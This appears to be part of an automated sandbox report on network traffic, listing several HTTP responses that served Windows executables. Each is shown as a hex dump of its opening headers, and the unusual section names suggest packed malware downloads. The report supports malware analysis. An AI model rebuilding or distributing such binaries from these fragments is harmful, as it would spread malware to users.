00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:56:19 GMTContent-Type: application/octet-streamContent-Length: 1939456Last-Modified: Fri, 26 Jul 2024 15:02:33 GMTConnection: keep-aliveETag: "66a3ba89-1d9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4d 00 00 04 00 00 36 78 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c dc 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc db 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 74 6d 6b 73 62 62 74 00 80 1a 00 00 60 32 00 00 7e 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6f 73 6e 6c 65 65 68 00 10 00 00 00 e0 4c 00 00 04 00 00 00 72 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4c 00 00 22 00 00 00 76 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:56:21 GMTContent-Type: application/octet-streamContent-Length: 1895424Last-Modified: Fri, 26 Jul 2024 15:01:58 GMTConnection: keep-aliveETag: "66a3ba66-1cec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 28 4c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc be 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c be 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 77 66 6c 74 6b 69 69 00 e0 19 00 00 f0 30 00 00 d2 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 77 74 69 73 75 6f 75 00 10 00 00 00 d0 4a 00 00 06 00 00 00 c4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 ca 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:04 GMTContent-Type: application/octet-streamContent-Length: 867038Last-Modified: Fri, 26 Jul 2024 15:52:44 GMTConnection: keep-aliveETag: "66a3c64c-d3ade"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 90 59 00 00 00 00 00 00 00 00 00 00 3e 13 0d 00 a0 27 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 90 59 00 00 00 40 0f 00 00 5a 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 a0 0f 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:04 GMTContent-Type: application/octet-streamContent-Length: 250368Last-Modified: Fri, 26 Jul 2024 15:47:14 GMTConnection: keep-aliveETag: "66a3c502-3d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 67 94 73 08 06 fa 20 08 06 fa 20 08 06 fa 20 67 70 51 20 13 06 fa 20 67 70 64 20 18 06 fa 20 67 70 50 20 6c 06 fa 20 01 7e 69 20 03 06 fa 20 08 06 fb 20 7b 06 fa 20 67 70 55 20 09 06 fa 20 67 70 60 20 09 06 fa 20 67 70 67 20 09 06 fa 20 52 69 63 68 08 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 6c 42 a1 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 78 03 02 00 00 00 00 4c 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 9a 02 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 58 02 00 78 00 00 00 00 c0 04 02 08 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 19 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 32 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 79 6f 62 6f 79 00 00 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 65 7a 61 6e 61 7a 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 9a 00 00 00 c0 04 02 00 9c 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:07 GMTContent-Type: application/octet-streamContent-Length: 311296Last-Modified: Fri, 26 Jul 2024 15:36:02 GMTConnection: keep-aliveETag: "66a3c262-4c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 1c a2 f4 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 a2 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 34 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 e9 02 00 00 20 00 00 00 ec 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 c9 01 00 00 20 03 00 00 cc 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 04 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 